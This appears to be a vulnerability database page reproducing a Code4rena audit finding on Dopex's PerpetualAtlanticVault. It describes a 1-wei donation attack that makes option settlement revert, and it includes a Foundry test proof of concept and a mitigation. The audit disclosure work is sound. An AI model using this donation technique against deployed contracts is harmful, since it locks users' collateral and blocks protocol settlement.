Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2023-08-DOPEX-FINDINGS-ISSUES-2081
HistorySep 06, 2023 - 12:00 a.m.

Options could not be settled, causing liquidity get locked in vault

2023-09-0600:00:00
Code4rena
github.com
5
rdpxv2core
perpetualatlanticvault
settlement vulnerability
liquidity locked
dos
donation attack vector
erc20
foundry

AI Score

7

Confidence

Low

JSON

Lines of code
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVault.sol#L359-L361&gt;
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVaultLP.sol#L199-L205&gt;

Vulnerability details

Impact

In settle logics, RdpxV2Core contract calls to PerpetualAtlanticVault.settle() to update funding, burn option tokens and do some token settles. However, the logic could be reverted in the call IPerpetualAtlanticVaultLP(addresses.perpetualAtlanticVaultLP).subtractLoss(ethAmount) because of donation attack vector. An attacker could transfer only 1 wei to PerpetualAtlanticVaultLP contract to make the logic in function PerpetualAtlanticVaultLP.subtractLoss get reverted.
So far, the impacts could be: 1.collateral get locked there; 2.protocol’s settling function get DoS; 3. Pay funding for PerpetualAtlanticVault blocked

Proof of Concept

diff --git a/tests/rdpxV2-core/Unit.t.sol b/tests/rdpxV2-core/Unit.t.sol
index e11c284..a85c296 100644
--- a/tests/rdpxV2-core/Unit.t.sol
+++ b/tests/rdpxV2-core/Unit.t.sol
@@ -333,6 +333,24 @@ contract Unit is ERC721Holder, Setup {
     );
   }
 
+  function testSettle_DoS() public {
+    rdpxV2Core.bond(5 * 1e18, 0, address(this));
+    rdpxV2Core.bond(1 * 1e18, 0, address(this));
+
+    vault.addToContractWhitelist(address(rdpxV2Core));
+    uint256[] memory _ids = new uint256[](1);
+    _ids[0] = 0;
+    rdpxPriceOracle.updateRdpxPrice(1e7);
+
+    address attacker = vm.addr(1337);
+    deal(address(weth), attacker, 1 ether);
+    vm.startPrank(attacker);
+    weth.transfer(address(vaultLp), 1);
+    vm.stopPrank();
+    vm.expectRevert("Not enough collateral was sent out");
+    rdpxV2Core.settle(_ids);
+  }
+
   function testWithdraw() public {
     rdpxV2Core.addToDelegate(1 * 1e18, 10e8);

Tools Used

Foundry

Recommended Mitigation Steps

Consider changing the way to track loss in PerpetualAtlanticVaultLP i.e: use ERC20#transfer() to transfer token from PerpetualAtlanticVaultLP to RdpxV2Core contract and then calculate loss within the same function instead of using PerpetualAtlanticVault to call ERC20#transferFrom

Assessed type

DoS

The text was updated successfully, but these errors were encountered:

All reactions

AI Score

7

Confidence

Low

JSON